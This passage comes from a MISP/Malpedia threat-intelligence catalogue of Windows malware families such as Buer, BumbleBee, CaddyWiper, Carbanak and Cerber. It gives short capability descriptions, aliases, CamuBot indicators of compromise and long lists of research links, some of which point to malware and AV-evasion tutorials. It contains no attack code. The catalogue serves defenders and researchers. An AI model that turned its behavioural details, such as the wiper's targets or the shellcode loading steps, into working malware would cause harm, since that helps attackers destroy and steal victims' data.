https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb

https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

BTCWare

The tag is: misp-galaxy:malpedia="BTCWare"

BTCWare is also known as:

Table 3093. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware

https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/

BUBBLEWRAP

BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.

The tag is: misp-galaxy:malpedia="BUBBLEWRAP"

BUBBLEWRAP is also known as:

Table 3094. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap

https://attack.mitre.org/software/S0043/

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

Buer

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.

The tag is: misp-galaxy:malpedia="Buer"

Buer is also known as:

  • Buerloader

  • RustyBuer

Table 3095. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.buer

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/

https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader

https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program

https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/

https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96

https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/

https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://twitter.com/StopMalvertisin/status/1182505434231398401

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf

https://twitter.com/SophosLabs/status/1321844306970251265

http://www.secureworks.com/research/threat-profiles/gold-blackburn

https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://blog.minerva-labs.com/stopping-buerloader

https://blog.group-ib.com/prometheus-tds

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

http://www.secureworks.com/research/threat-profiles/gold-symphony

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

BUGHATCH

According to Elastic, BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject).

The tag is: misp-galaxy:malpedia="BUGHATCH"

BUGHATCH is also known as:

Table 3097. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch

https://www.elastic.co/security-labs/bughatch-malware-analysis

BumbleBee

This malware is delivered by an ISO file, with an DLL inside with a custom loader. Because of the unique user-agent "bumblebee" this malware was dubbed BUMBLEBEE. At the time of Analysis by Google’s Threat Analysis Group (TAG) BumbleBee was observed to fetch Cobalt Strike Payloads.

The tag is: misp-galaxy:malpedia="BumbleBee"

BumbleBee is also known as:

  • COLDTRAIN

  • SHELLSTING

  • Shindig

Table 3099. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/

https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://www.youtube.com/watch?v=JoKJNfLAc0Y

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

https://twitter.com/Artilllerie/status/1701250284238823493

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/

https://blog.talosintelligence.com/following-the-lnk-metadata-trail

https://isc.sans.edu/diary/28636

https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day—​cve-2021-40444—​hits-windows—​tr.html

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/

https://0xtoxin.github.io/malware%20analysis/Bumblebee-DocuSign-Campaign/

https://isc.sans.edu/diary/rss/28664

https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664

https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/

https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056

https://blog.cerbero.io/?p=2617

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://twitter.com/Intrinsec/status/1699779830294970856

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks

https://isc.sans.edu/diary/rss/28636

https://community.riskiq.com/article/0b211905/description

https://bin.re/blog/the-dga-of-bumblebee/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/

https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads

https://www.youtube.com/watch?v=pIXl79IPkLI

https://twitter.com/ESETresearch/status/1577963080096555008

https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/

https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign

https://blog.krakz.fr/articles/bumblebee/

https://www.botconf.eu/wp-content/uploads/formidable/2/2023_4889_DESOUZA.pdf

https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf

https://twitter.com/threatinsight/status/1648330456364883968

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://twitter.com/Intrinsec/status/1709609529070010447

https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/

https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/

https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

https://threathunt.blog/bzz-bzz-bumblebee-loader

BundleBot

Bundlebot is an info stealer that abuses the single-file dotnet bundle which operates as a self-contained executable that does not require any preinstalled dotnet runtime version. Bundlebot functionality targets a wide variety of data including the victim’s system information, browser data, telegram data, discord token, Facebook account information, and screenshots.

The tag is: misp-galaxy:malpedia="BundleBot"

BundleBot is also known as:

Table 3101. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bundlebot

https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/

Buterat

The tag is: misp-galaxy:malpedia="Buterat"

Buterat is also known as:

  • spyvoltar

Table 3103. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat

http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html

Buzus

The tag is: misp-galaxy:malpedia="Buzus"

Buzus is also known as:

  • Yimfoca

Table 3104. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A

c0d0so0

The tag is: misp-galaxy:malpedia="c0d0so0"

c0d0so0 is also known as:

Table 3106. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0

CabArt

The tag is: misp-galaxy:malpedia="CabArt"

CabArt is also known as:

Table 3107. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart

CaddyWiper

CaddyWiper is another destructive malware believed to be deployed to target Ukraine.

CaddyWiper wipes all files under C:\Users and all also all files under available drives from D: to Z: by overwriting the data with NULL value. If the target file is greater than 0xA00000 bytes in size (10MB), it will only wipe the first 0xA00000 bytes.

It also wipes disk partitions from \\.\PHYSICALDRIVE9 to \\.\PHYSICALDRIVE0 by overwriting the first 0x780 bytes with NULL.

The tag is: misp-galaxy:malpedia="CaddyWiper"

CaddyWiper is also known as:

  • KillDisk.NCX

Table 3108. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://cybersecuritynews.com/destructive-data-wiper-malware/

https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/

https://www.nioguard.com/2022/03/analysis-of-caddywiper.html

https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/

https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

https://twitter.com/HackPatch/status/1503538555611607042

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://cert.gov.ua/article/39518

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://n0p.me/2022/03/2022-03-26-caddywiper/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://twitter.com/silascutler/status/1513870210398363651

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper

https://twitter.com/ESETresearch/status/1503436420886712321

https://www.mandiant.com/resources/blog/gru-disruptive-playbook

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/

https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/

https://cert.gov.ua/article/3718487

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/

https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/

https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html

https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/

CadelSpy

CadelSpy is a spyware supposedly used by Iranian threat actors. It has several functions such as logging keystrokes, record audio, capture screenshots and webcam photos, and steal any documents that are sent to a printer.

The tag is: misp-galaxy:malpedia="CadelSpy"

CadelSpy is also known as:

  • Cadelle

Table 3109. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy

https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf

Cameleon

PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.

The tag is: misp-galaxy:malpedia="Cameleon"

Cameleon is also known as:

  • StormKitty

Table 3111. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html

CamuBot

There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :

CamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479

Dropped Files on disk :

C:\Users\user~1\AppData\Local\Temp\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1

C:\Users\user~1\AppData\Local\Temp\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8

C:\ProgramData\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190

Protecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi

A new driver is installed : C:\Windows\system32\drivers\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8

ftusbload2.sys set 28 IRP handlers.

The tag is: misp-galaxy:malpedia="CamuBot"

CamuBot is also known as:

Table 3113. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot

https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/

Cannibal Rat

Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.

The tag is: misp-galaxy:malpedia="Cannibal Rat"

Cannibal Rat is also known as:

Table 3114. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat

http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html

Carbanak

MyCERT states that Carbanak is a remote backdoor designed for espionage, data exfiltration, and to remote control.

The attacker deploy malware via spear phishing email to lure the user to open and run the malicious attachment that will infect the machine. The main objective of this campaign is primarily to remotely control the infected machine and gain control of the internal destinations of money processing services such as Automated Teller Machines(ATM) and financial accounts. The following information are the malware capabilities:

The tag is: misp-galaxy:malpedia="Carbanak"

Carbanak is also known as:

  • Anunak

  • Sekur RAT

Table 3116. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://threatintel.blog/OPBlueRaven-Part1/

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.mandiant.com/resources/evolution-of-fin7

https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/

https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html

https://www.mandiant.com/resources/blog/evolution-of-fin7

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html

https://unit42.paloaltonetworks.com/atoms/mulelibra/

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

https://threatintel.blog/OPBlueRaven-Part2/

Cardinal RAT

Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.

The tag is: misp-galaxy:malpedia="Cardinal RAT"

Cardinal RAT is also known as:

Table 3118. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412

CargoBay

CargoBay is a newer malware family which was first observed in 2022 and is notable for being written in the Rust language. CargoBay is likely based on source code taken from 'Black Hat Rust' GitHub project (https://github.com/skerkour/black-hat-rust). CargoBay is usually distributed via phishing emails, and the malware binaries may be disguised as legitimate applications. Upon execution, the malware starts by performing environmental checks such as checking its execution path and the configured system language. If the tests pass, then the malware proceeds to gather basic system information and register with its C2 via HTTP from which it receives JSON-formatted jobs to carry out. CargoBay can execute commands via the command line and downloading additional malware binaries.

The tag is: misp-galaxy:malpedia="CargoBay"

CargoBay is also known as:

Table 3119. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay

https://exchange.xforce.ibmcloud.com/malware-analysis/guid:87abff769352d8208e403331c86eb95f

CARROTBALL

CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.

The tag is: misp-galaxy:malpedia="CARROTBALL"

CARROTBALL is also known as:

Table 3120. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Casper

ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.

The tag is: misp-galaxy:malpedia="Casper"

Casper is also known as:

Table 3122. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.casper

https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/

Catchamas

The tag is: misp-galaxy:malpedia="Catchamas"

Catchamas is also known as:

Table 3124. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

CCleaner Backdoor

According to CrowdStrike, this backdoor was discovered embedded in the legitimate, signed version of CCleaner 5.33, and thus constitutes a supply chain attack.

The tag is: misp-galaxy:malpedia="CCleaner Backdoor"

CCleaner Backdoor is also known as:

  • DIRTCLEANER

Table 3125. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

https://stmxcsr.com/persistence/print-processor.html

https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident

https://www.secureworks.com/research/threat-profiles/bronze-atlas

http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/

https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident

https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/

https://risky.biz/whatiswinnti/

https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf

https://twitter.com/craiu/status/910148928796061696

http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor

https://www.wired.com/story/ccleaner-malware-targeted-tech-firms

https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/

http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html

https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf

https://blog.avast.com/progress-on-ccleaner-investigation

CEELOADER

Mandiant characterizes this malware as a downloader and shellcode stager.

The tag is: misp-galaxy:malpedia="CEELOADER"

CEELOADER is also known as:

Table 3126. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader

https://www.mandiant.com/resources/blog/russian-targeting-gov-business

CenterPOS

The tag is: misp-galaxy:malpedia="CenterPOS"

CenterPOS is also known as:

  • cerebrus

Table 3127. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos

https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html

Cerber

A prolific ransomware which originally added ".cerber" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.

The tag is: misp-galaxy:malpedia="Cerber"

Cerber is also known as:

Table 3128. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/

https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/

https://www.youtube.com/watch?v=y8Z9KnL8s8s

https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf

https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf

https://www.justice.gov/usao-dc/press-release/file/1021186/download

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/

Cerbu

This malware family delivers its artifacts packed with free and generic packers. It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.

The tag is: misp-galaxy:malpedia="Cerbu"

Cerbu is also known as:

Table 3129. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner

ChaChi

The tag is: misp-galaxy:malpedia="ChaChi"

ChaChi is also known as:

Table 3131. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chachi

https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat

Chaos (Windows)

In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.

The tag is: misp-galaxy:malpedia="Chaos (Windows)"

Chaos (Windows) is also known as:

  • FakeRyuk

  • RyukJoke

  • Yashma

Table 3135. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos

https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/

https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/

https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html

https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/

https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia

https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree

https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction

https://threatmon.io/chaos-unleashed-a-technical-analysis-of-a-novel-ransomware/

https://twitter.com/vinopaljiri/status/1519645742440329216

https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html

https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/

